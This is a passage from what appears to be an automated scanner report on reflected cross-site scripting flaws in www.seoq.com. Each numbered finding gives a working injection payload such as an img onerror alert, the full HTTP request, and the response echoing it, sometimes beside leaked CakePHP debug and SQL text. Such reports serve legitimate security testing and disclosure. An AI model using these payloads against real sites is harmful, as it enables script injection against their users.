Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:55 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 55865


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
< 22727afe1<img src=a onerror=alert(1)>6a57730655e and
site_url LIKE 'N' ORDER BY `report_date` DESC LIMIT 2 </p>
...[SNIP]...

7.110. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2272/N

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19a08'%3b280f9175559 was submitted in the REST URL parameter 6. This input was echoed as 19a08';280f9175559 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/04/22/2272/N19a08'%3b280f9175559 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:19 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54542


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/04/22/2272/N19a08';280f9175559';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...

7.111. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2272/N

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 1874b<img%20src%3da%20onerror%3dalert(1)>838bfb09b7d was submitted in the REST URL parameter 6. This input was echoed as 1874b<img src=a onerror=alert(1)>838bfb09b7d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/2272/N1874b<img%20src%3da%20onerror%3dalert(1)>838bfb09b7d HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:22 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:22 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<img src=a onerror=alert(1)>838bfb09b7d" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/04/22/2272/N1874b<img src=a onerror=alert(1)>838bfb09b7dddd</a>
...[SNIP]...

7.112. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2272/N

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9011"><img%20src%3da%20onerror%3dalert(1)>7829e282ab5 was submitted in the REST URL parameter 6. This input was echoed as b9011"><img src=a onerror=alert(1)>7829e282ab5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/2272/Nb9011"><img%20src%3da%20onerror%3dalert(1)>7829e282ab5 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:18 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:19 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/04/22/2272/Nb9011"><img src=a onerror=alert(1)>7829e282ab5" title="SEO Quotient for ">
...[SNIP]...

7.113. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2837/N

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad3ad'%3b463e9885ca0 was submitted in the REST URL parameter 5. This input was echoed as ad3ad';463e9885ca0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/05/01/2837ad3ad'%3b463e9885ca0/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:53 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54591


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/05/01/2837ad3ad';463e9885ca0/N';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...

7.114. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2837/N

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2f78"><img%20src%3da%20onerror%3dalert(1)>bb9cb173e31 was submitted in the REST URL parameter 5. This input was echoed as a2f78"><img src=a onerror=alert(1)>bb9cb173e31 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2837a2f78"><img%20src%3da%20onerror%3dalert(1)>bb9cb173e31/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:53 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 56035


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/05/01/2837a2f78"><img src=a onerror=alert(1)>bb9cb173e31/N" title="SEO Quotient for ">
...[SNIP]...

7.115. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2837/N

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e4fbb<img%20src%3da%20onerror%3dalert(1)>4613103a22d was submitted in the REST URL parameter 5. This input was echoed as e4fbb<img src=a onerror=alert(1)>4613103a22d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2837e4fbb<img%20src%3da%20onerror%3dalert(1)>4613103a22d/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:56 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 55871


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
< 2837e4fbb<img src=a onerror=alert(1)>4613103a22d and
site_url LIKE 'N' ORDER BY `report_date` DESC LIMIT 2 </p>
...[SNIP]...

7.116. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2837/N

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 27b60<img%20src%3da%20onerror%3dalert(1)>ef64cfd30bc was submitted in the REST URL parameter 6. This input was echoed as 27b60<img src=a onerror=alert(1)>ef64cfd30bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2837/N27b60<img%20src%3da%20onerror%3dalert(1)>ef64cfd30bc HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:15 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:55:15 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<img src=a onerror=alert(1)>ef64cfd30bc" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/05/01/2837/N27b60<img src=a onerror=alert(1)>ef64cfd30bcddd</a>
...[SNIP]...

7.117. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2837/N

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17a92"><img%20src%3da%20onerror%3dalert(1)>de0a2e8b0b4 was submitted in the REST URL parameter 6. This input was echoed as 17a92"><img src=a onerror=alert(1)>de0a2e8b0b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2837/N17a92"><img%20src%3da%20onerror%3dalert(1)>de0a2e8b0b4 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:12 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:55:12 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/05/01/2837/N17a92"><img src=a onerror=alert(1)>de0a2e8b0b4" title="SEO Quotient for ">
...[SNIP]...

7.118. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2837/N

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3919e'%3bac9e2d2d60d was submitted in the REST URL parameter 6. This input was echoed as 3919e';ac9e2d2d60d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/05/01/2837/N3919e'%3bac9e2d2d60d HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:13 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54542


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/05/01/2837/N3919e';ac9e2d2d60d';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...

7.119. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2838/N

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e2d53<img%20src%3da%20onerror%3dalert(1)>004fea5ea88 was submitted in the REST URL parameter 5. This input was echoed as e2d53<img src=a onerror=alert(1)>004fea5ea88 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2838e2d53<img%20src%3da%20onerror%3dalert(1)>004fea5ea88/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:42 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 55871


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
< 2838e2d53<img src=a onerror=alert(1)>004fea5ea88 and
site_url LIKE 'N' ORDER BY `report_date` DESC LIMIT 2 </p>
...[SNIP]...

7.120. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2838/N

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b22fb"><img%20src%3da%20onerror%3dalert(1)>a2def4fbbbf was submitted in the REST URL parameter 5. This input was echoed as b22fb"><img src=a onerror=alert(1)>a2def4fbbbf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2838b22fb"><img%20src%3da%20onerror%3dalert(1)>a2def4fbbbf/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:37 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 56035


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/05/01/2838b22fb"><img src=a onerror=alert(1)>a2def4fbbbf/N" title="SEO Quotient for ">
...[SNIP]...

7.121. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2838/N

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2955f'%3b8adf3a8c684 was submitted in the REST URL parameter 5. This input was echoed as 2955f';8adf3a8c684 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/05/01/28382955f'%3b8adf3a8c684/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:38 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54591


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/05/01/28382955f';8adf3a8c684/N';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...

7.122. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2838/N

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 36672<img%20src%3da%20onerror%3dalert(1)>78327454c47 was submitted in the REST URL parameter 6. This input was echoed as 36672<img src=a onerror=alert(1)>78327454c47 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2838/N36672<img%20src%3da%20onerror%3dalert(1)>78327454c47 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:00 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:55:00 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<img src=a onerror=alert(1)>78327454c47" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/05/01/2838/N36672<img src=a onerror=alert(1)>78327454c47ddd</a>
...[SNIP]...

7.123. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2838/N

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce991'%3b7b1a3fc7dec was submitted in the REST URL parameter 6. This input was echoed as ce991';7b1a3fc7dec in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/05/01/2838/Nce991'%3b7b1a3fc7dec HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:57 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54542


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/05/01/2838/Nce991';7b1a3fc7dec';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...

7.124. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2838/N

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a547"><img%20src%3da%20onerror%3dalert(1)>e343fb66cd3 was submitted in the REST URL parameter 6. This input was echoed as 5a547"><img src=a onerror=alert(1)>e343fb66cd3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2838/N5a547"><img%20src%3da%20onerror%3dalert(1)>e343fb66cd3 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:57 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:57 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

